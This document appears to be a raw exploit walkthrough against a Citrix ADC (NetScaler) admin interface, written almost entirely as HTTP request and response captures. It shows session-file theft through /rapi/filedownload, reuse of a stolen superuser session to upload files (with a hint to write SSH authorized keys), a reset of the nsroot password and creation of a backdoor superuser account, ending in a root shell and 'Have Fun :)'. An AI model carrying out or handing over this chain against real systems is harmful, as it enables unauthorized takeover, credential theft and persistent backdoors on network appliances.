request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
request
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400
response
HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
request
GET /menu/stc HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
response
HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;
</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>
note: var rand = "181103693.1594540472072128";
request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz
<appfwprofile><login></login></appfwprofile>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
request
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....
resquest
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";
You Can Upload to /root/.ssh/authorized_key
Note: Get rand_key & SESSID from file:sess_[32charactor]
request
POST /rapi/uploadtext HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8
{"errorcode":"0","message":"Done"}
request
PUT /nitro/v1/config/systemuser HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}
response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot@192.168.3.18
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhostrequest:CreateUser
POST /nitro/v1/config/systemuser HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}
response:CreateUser
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}
response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh nsroot1@192.168.3.18
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost#
Have Fun :)